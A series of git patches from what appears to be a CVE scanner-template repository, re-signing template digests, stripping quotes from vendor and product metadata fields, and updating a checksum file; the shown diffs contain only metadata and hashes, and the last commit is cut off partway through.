f136a40ad93d6408410c298580351460e365785d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:33:35 +0000 Subject: [PATCH 204/847] Auto Template Signing [Thu May 23 21:33:35 UTC 2024] :robot: --- http/cves/2022/CVE-2022-41473.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 9b99471bec..bfd1a094ab 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f8b489e0526233fadc0b71daa6165ce5043a99bcc11cfb0efec40a01d0adb68e022100c10051f21c0b7d95b703834dd555ff205cff4cd72e743f60787f628f9800bb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fb545389e31133e3fedb0130ed08e7c51d78de91 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:15:20 +0530 Subject: [PATCH 205/847] fix queries --- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 4 ++-- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-46805.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-21893.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- 19 files changed, 20 insertions(+), 20 deletions(-) diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index ffcab418a6..732fbc9eb4 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -24,7 +24,7 @@ info: cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: "cisco" + vendor: cisco product: rv132w_firmware tags: cve,cve2018,cisco,router diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 66bf5e553e..18b2d6a8e9 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -25,7 +25,7 @@ info: cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: "circontrol" + vendor: circontrol product: circarlife_scada tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 8218daf197..b9ad011458 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -26,7 +26,7 @@ info: metadata: max-request: 1 vendor: elastic - product: "kibana" + product: kibana tags: cve,cve2018,lfi,kibana,vulhub,elastic http: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 8643df9cae..cc2e60bd10 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -27,7 +27,7 @@ info: verified: true max-request: 3 vendor: paessler - product: "prtg_network_monitor" + product: prtg_network_monitor shodan-query: title:"prtg" tags: cve2020,cve,prtg,disclosure,paessler diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index 8709514ac1..e4516b072b 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 3 vendor: wclovers - product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible" + product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible framework: wordpress publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index dc6449f51e..0489b4de45 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -24,7 +24,7 @@ info: metadata: max-request: 1 vendor: saltstack - product: "salt" + product: salt tags: cve,cve2021,saltapi,rce,saltstack,unauth http: diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index fb0446244f..19c5820323 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -25,7 +25,7 @@ info: cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: "seopanel" + vendor: seopanel product: seo_panel tags: cve2021,cve,seopanel,xss diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index b684490a1e..ac86cf9c30 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -25,7 +25,7 @@ info: metadata: max-request: 9 vendor: std42 - product: "elfinder" + product: elfinder github: https://github.com/Studio-42/elFinder tags: cve2021,cve,elfinder,misconfig,rce,oss,std42 diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 6de3ff1b9c..503b8f7ace 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -24,8 +24,8 @@ info: cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 - vendor: "redash" - product: "redash" + vendor: redash + product: redash shodan-query: http.favicon.hash:698624197 tags: cve2021,cve,hackerone,redash,auth-bypass diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index dfd0bce904..bf89028ef1 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -26,7 +26,7 @@ info: metadata: max-request: 1 vendor: casbin - product: "casdoor" + product: casdoor shodan-query: http.title:"Casdoor" tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 63542941b5..cbf14d6f72 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -27,7 +27,7 @@ info: metadata: verified: true max-request: 1 - vendor: "adobe" + vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 09f5e90b4f..53bdc464b9 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -26,7 +26,7 @@ info: metadata: max-request: 2 vendor: codemenschen - product: "gift_vouchers" + product: gift_vouchers framework: wordpress fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 11bb3d3bb4..73b4aef3a0 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -28,7 +28,7 @@ info: verified: true max-request: 1 vendor: igniterealtime - product: "openfire" + product: openfire shodan-query: title:"openfire" tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 4e12ddae19..caf93a901a 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -28,7 +28,7 @@ info: verified: true max-request: 1 vendor: gibbonedu - product: "gibbon" + product: gibbon shodan-query: http.favicon.hash:-165631681 fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,lfi,gibbonedu diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 9cf94669f8..4fb876ef38 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -22,7 +22,7 @@ info: metadata: max-request: 2 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2023,kev,auth-bypass,ivanti diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 21a29b80a6..757d797758 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 2 vendor: hikvision - product: "intercom_broadcast_system" + product: intercom_broadcast_system fofa-query: "icon_hash=\"-1830859634\"" tags: cve,cve2023,hikvision,rce diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index d0ecc2eb4e..0c542dddb3 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -22,7 +22,7 @@ info: metadata: max-request: 1 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,rce,ivanti diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 5bacd3dd43..381a5e5c93 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -23,7 +23,7 @@ info: metadata: max-request: 1 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,ssrf,ivanti diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index bdfeb11f65..572a2940d4 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 1 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,xxe,ivanti From 20cea714a93802b7c2788d500ece0eb60231b5c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:47:21 +0000 Subject: [PATCH 207/847] Auto Generated Templates Checksum [Thu May 23 21:47:21 UTC 2024] :robot: --- templates-checksum.txt | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0f2f691cf8..85abfd4a45 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1372,7 +1372,7 @@ http/cves/2017/CVE-2017-9805.yaml:4fe5223d9747e0cd6872564b8069d1d2074a8fdc http/cves/2017/CVE-2017-9822.yaml:137875cd55de914baf6ad6cca7783b728484715c http/cves/2017/CVE-2017-9833.yaml:c08b62014c13f6adbdf1b39fb6199d35f4df773c http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:b45c016b95763662a90197111431384d3c845e21 +http/cves/2018/CVE-2018-0127.yaml:0164997996d5bfeabd4811bb3b48e4d1429e4621 http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c http/cves/2018/CVE-2018-1000129.yaml:03328d29e7ad3ec82f00b8de687d940ec9060db9 http/cves/2018/CVE-2018-1000130.yaml:c82881e9663b78ba5b44251f15b4e93555896100 @@ -1448,14 +1448,14 @@ http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a -http/cves/2018/CVE-2018-16671.yaml:64bc8352dc9795148d754ba9dbfb83930917d316 +http/cves/2018/CVE-2018-16671.yaml:b476134832a83699c3f6f6a9cc62fc14afbb2bcf http/cves/2018/CVE-2018-16716.yaml:a1f2d156568e8a37a17de9a2759623c13ba02f41 http/cves/2018/CVE-2018-16761.yaml:dbdf46a59546a320d395c2436fbca07cc9c1be86 http/cves/2018/CVE-2018-16763.yaml:804e34994429a56b36f2447a635c4bdc5dd59a07 http/cves/2018/CVE-2018-16836.yaml:98b608b7b785160c1ca398b8ccf5457933dafcbc http/cves/2018/CVE-2018-16979.yaml:94bde7048fe9f62210ccb11497dbc11e1c3b1c99 http/cves/2018/CVE-2018-17153.yaml:e004a49d22b96f5006592b6000346b3c51b7c321 -http/cves/2018/CVE-2018-17246.yaml:9f7aa278d5520e5d3872ab24cb68dc261ea3a81c +http/cves/2018/CVE-2018-17246.yaml:32adb5762d66a9817fc2a3a1de90400021bf65ab http/cves/2018/CVE-2018-17254.yaml:796bc823bb38f76e61b2c6a7b8d508a6a81a1cb8 http/cves/2018/CVE-2018-17422.yaml:90edc0d3636a6670e628eccc7eea61be4144918b http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 @@ -1717,7 +1717,7 @@ http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 http/cves/2020/CVE-2020-11530.yaml:e4de2a4e8e617c78ba87fa185790a0495bf0e8da http/cves/2020/CVE-2020-11546.yaml:0028a1adf59ba8524634f55e24652564fc5ce6b5 -http/cves/2020/CVE-2020-11547.yaml:28603cf2bfe7118db8addf09115b1a89a1c6a7a3 +http/cves/2020/CVE-2020-11547.yaml:51718edad043528ebbcde65242c7663b7812948c http/cves/2020/CVE-2020-11710.yaml:c2bde61a09512b2cc4c86a2d7bdaa5e85172896e http/cves/2020/CVE-2020-11738.yaml:4c2e75351d44e91b76d713e865d22f88200e3567 http/cves/2020/CVE-2020-11798.yaml:d9e0f98c88d58160585123f986858af68e699b2e @@ -2076,7 +2076,7 @@ http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 http/cves/2021/CVE-2021-24838.yaml:0cc51d4d1c10c2f4af870aa9b636013be8130a28 -http/cves/2021/CVE-2021-24849.yaml:a2756dc668993fb9ab5897adf3271fe715de94c1 +http/cves/2021/CVE-2021-24849.yaml:0b8d4f84d5bdbcde91094c4d59650386d57abf37 http/cves/2021/CVE-2021-24862.yaml:c12546a4335f7196f4b2813946601c2f74e79cca http/cves/2021/CVE-2021-24875.yaml:af4472bf9db8cc8423ae0c3b0ebe71c3767829bc http/cves/2021/CVE-2021-24891.yaml:d25791df32146893bfb3dc68d5b0175a4a53e2ee @@ -2117,7 +2117,7 @@ http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 http/cves/2021/CVE-2021-25114.yaml:10297fac562f4e9b4758c40509edd8eab28810f1 http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 http/cves/2021/CVE-2021-25120.yaml:180bff131d7b46afe0cbc57424767b9cad725a83 -http/cves/2021/CVE-2021-25281.yaml:c14d857573fa79cb387dfaded5eaf57f0c026169 +http/cves/2021/CVE-2021-25281.yaml:aa1b740e4c902b0387a7a487f99a82e45cc72a4d http/cves/2021/CVE-2021-25296.yaml:eebdd9e01f7de42eac8b0acc73ef7737c22d6dc3 http/cves/2021/CVE-2021-25297.yaml:798c5dd2384ee37d90e12cc73b40dd17203a5e3a http/cves/2021/CVE-2021-25298.yaml:a1bd4f65462afa430f096448b5615192e924dc52 @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 http/cves/2021/CVE-2021-29625.yaml:89de3db861b7d733e2ba3aa140262d92187a64c5 -http/cves/2021/CVE-2021-3002.yaml:0efe60964cc119aaf718c504451830e6a5322d7c +http/cves/2021/CVE-2021-3002.yaml:f80274efeea35bf2c073889b5ab76ce619691b69 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c http/cves/2021/CVE-2021-30134.yaml:7528c665e9c5128fe999de9ce7b20a371021ae74 @@ -2212,7 +2212,7 @@ http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 http/cves/2021/CVE-2021-3223.yaml:087280fa99bb84c2ea0ee9e446ede3320cfb4923 http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 http/cves/2021/CVE-2021-32618.yaml:1282d29e43f0a00e93a6fceebed1750a42af490f -http/cves/2021/CVE-2021-32682.yaml:c8d43f4eeddb9da520464011c01a7dd17114f90e +http/cves/2021/CVE-2021-32682.yaml:51ca70b0cb3413265ae052b942999f9e3185bfd4 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 http/cves/2021/CVE-2021-32820.yaml:c8e898d2d63b318200ed63044d0be7334a2e6f1b @@ -2312,7 +2312,7 @@ http/cves/2021/CVE-2021-40972.yaml:d27431d64ba53011509e840670cc2119f4dc6be9 http/cves/2021/CVE-2021-40973.yaml:e4beb729c195766e7d1b9460eb88a622e2780258 http/cves/2021/CVE-2021-40978.yaml:62ebc40431004d08ba54cf76229e706d2402c44a http/cves/2021/CVE-2021-41174.yaml:4c24cd07dea7803624fb8d4cfa46b618c024d961 -http/cves/2021/CVE-2021-41192.yaml:aa6434af889315daa1b956bd649a67c51abea63a +http/cves/2021/CVE-2021-41192.yaml:429f7fe2a345a9b2aafffe5d8876b9461813840d http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 http/cves/2021/CVE-2021-41277.yaml:8fda77b1487c28d680cc2eae21e04c291c2a660d http/cves/2021/CVE-2021-41282.yaml:40c118c32ea07c6cbfab601a6e9c7999dd44ac79 @@ -2560,7 +2560,7 @@ http/cves/2022/CVE-2022-23881.yaml:af0d94cea1d7840f3800ea02e4e602cf960d2530 http/cves/2022/CVE-2022-23898.yaml:f8c8e4e7f9865bcec5cf8dac00c5c7bab1866bf2 http/cves/2022/CVE-2022-23944.yaml:320d92bd111caf4003aeac9a1ef9f65cee4f1f5d http/cves/2022/CVE-2022-24112.yaml:4034ea358c38ea2642cfbafd6bc5f9949c0e9a74 -http/cves/2022/CVE-2022-24124.yaml:169c71fc2f22ab52ebb6b2f77600cf2aee7077a6 +http/cves/2022/CVE-2022-24124.yaml:8892e5824c33368ec1d301ce8911f00e3da4b28d http/cves/2022/CVE-2022-24129.yaml:e9b5d1244a8f2dea948ea4cfb46b3756f0292aea http/cves/2022/CVE-2022-2414.yaml:68d31eaf41572c264f08d1f4bc5041cdb6543a36 http/cves/2022/CVE-2022-24181.yaml:776437592260aa5a0b327bd750557745bb2fa704 @@ -2792,7 +2792,7 @@ http/cves/2022/CVE-2022-4117.yaml:1e44f0c7ce464548cf7a8ff5c714866891b81a12 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 http/cves/2022/CVE-2022-41412.yaml:897d78be653f3c09f28e027006285ca2dfd67d8d http/cves/2022/CVE-2022-41441.yaml:53548507ba14aae755885a74642e9df3ac4b35e7 -http/cves/2022/CVE-2022-41473.yaml:3494e5c8590cb8ef169e2973afbf8deff741d211 +http/cves/2022/CVE-2022-41473.yaml:fa99025c3ea2cad17dc2ac9f491389950e581c55 http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 http/cves/2022/CVE-2022-42094.yaml:22cbf742c665310adc7ced1dd3f87664b96b4115 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 @@ -2967,7 +2967,7 @@ http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 http/cves/2023/CVE-2023-26255.yaml:72ba0cb106a848cbf4550abb5e379601fc8d57c7 http/cves/2023/CVE-2023-26256.yaml:235515a1f0e49888d8e059097494109563de4d3f http/cves/2023/CVE-2023-26347.yaml:e2a80f4ae72176cbd3d0b523754f551888e7bbda -http/cves/2023/CVE-2023-26360.yaml:9ae6adc24876a9f0e6eba59879e0cb520015d0c1 +http/cves/2023/CVE-2023-26360.yaml:20a2d969c967e6eff664ae11ef103045267d14f2 http/cves/2023/CVE-2023-26469.yaml:fef5e0a0a6c5d3fb658813db3402193eb13a9711 http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 @@ -2997,7 +2997,7 @@ http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 -http/cves/2023/CVE-2023-28662.yaml:146d269965800ab6ea40ae0c05bb94f1bcacceb1 +http/cves/2023/CVE-2023-28662.yaml:222138e63a1f9e06b5f00d0888a71b3ab9c5cbc2 http/cves/2023/CVE-2023-28665.yaml:f7cbf06ff60743045c2b85276c87e28b0182c049 http/cves/2023/CVE-2023-29084.yaml:c13b9fdcac929cdff02edcde7bd85a1b97fd8c31 http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a @@ -3036,7 +3036,7 @@ http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 http/cves/2023/CVE-2023-32243.yaml:bcbf1f8b9ae1c03a606866feaffa2c71ba08878b -http/cves/2023/CVE-2023-32315.yaml:4678aec33f9020ea7732d346fd884688fadcb9f5 +http/cves/2023/CVE-2023-32315.yaml:e083330b0d26565dca2ede8a3c21d3eb54b253f2 http/cves/2023/CVE-2023-32563.yaml:3ac13df7389a44c872cfc4bb0916de89c6912b40 http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a http/cves/2023/CVE-2023-34259.yaml:c522d53c7b0766136d4356c8330eb60fbe2ff6a7 http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c -http/cves/2023/CVE-2023-34598.yaml:90635e327c11d10e4dfc2da81ff445a669d976fb +http/cves/2023/CVE-2023-34598.yaml:1be9a6039ef50f2c4d57ec9bcc6f72221843af61 http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289 http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 @@ -3183,7 +3183,7 @@ http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c -http/cves/2023/CVE-2023-46805.yaml:024538c13ad62db9dd0d841eaa89d386f2f0c870 +http/cves/2023/CVE-2023-46805.yaml:916b3454c9764492dc7ae8ee347edf46837e3c81 http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 http/cves/2023/CVE-2023-4714.yaml:954bbf773a17e757e0e6643ef410202037e7c8f1 http/cves/2023/CVE-2023-47211.yaml:bf40361838f0afc267bc6c62161b3f0526a2b234 @@ -3231,7 +3231,7 @@ http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9 http/cves/2023/CVE-2023-6634.yaml:d517962a1689dbbaefe2ea502e451ba9009f1dd5 http/cves/2023/CVE-2023-6831.yaml:d1a44c75188bceced79fce8fe5b7f31e1e824e4b http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 -http/cves/2023/CVE-2023-6895.yaml:9f63f7d60c0a07f24f11688a0021a925aafa4c26 +http/cves/2023/CVE-2023-6895.yaml:584cf32c7d75ecd6dd264de23662de3855103f05 http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 @@ -3259,9 +3259,9 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21887.yaml:9e4e007bba9354b143ea5c286d57142e4a967673 -http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a -http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0 +http/cves/2024/CVE-2024-21887.yaml:cb8d4d94a8080fecc469fb969cc160593ba3982e +http/cves/2024/CVE-2024-21893.yaml:64a8c554db1ed2abfcbc75e53be146faec3f10f2 +http/cves/2024/CVE-2024-22024.yaml:224f5d9d9a963ca2833b033e443665bca843216c http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1045900bb85fc3bb0daae2fa73e5aefe3e652e8f +templates-checksum.txt:c703523bfec4c8d187b64761937a051ab2d45a4f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 726914d818e892276c2313912955f7672d5f99de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:49:06 +0000 Subject: [PATCH 208/847] Auto Template Signing [Thu May 23 21:49:06 UTC 2024] :robot: --- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- 